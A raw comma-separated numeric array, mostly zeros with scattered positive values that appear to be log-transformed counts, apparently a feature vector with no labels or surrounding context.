0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.276666119016055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 3.784189633918261, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.0841946160253877, 0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.0841946160253872, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 5.769774563315189, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 4.127134385045092, 0, 0.0, 0, 0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 5.46286043483228, 0, 0.0, 3.295836866004329, 1.0986122886681098, 0, 0, 0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 2.4849066497880004, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0, 4.828313737302301, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0, 6.198469360840316, 9.129638369467537, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.4825185607408002, 5.723585101952381, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 5.346437018291705, 4.490536906871891, 0.0, 5.375278407684165, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 6.711235389328078, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 0, 0.0, 1.6094379124341003, 0, 1.6094379124341003, 0, 0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 3.0841946160253872, 0.0, 0.0, 4.06534854782536, 5.1298987149230735, 0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.007333185232471, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.631631038266565, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.346437018291705, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, 2.550898738446989, 0.0, 0.0, 1.791759469228055, 0, 0.6931471805599453, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, 0, 3.6888794541139363, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0, 0.0, 2.302585092994046, 0.0, 2.772588722239781, 0.0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 2.4849066497880004, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0, 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.884768704067333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 3.9318256327243257, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.02535169073515, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 7.9730554676126895, 0.0, 0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 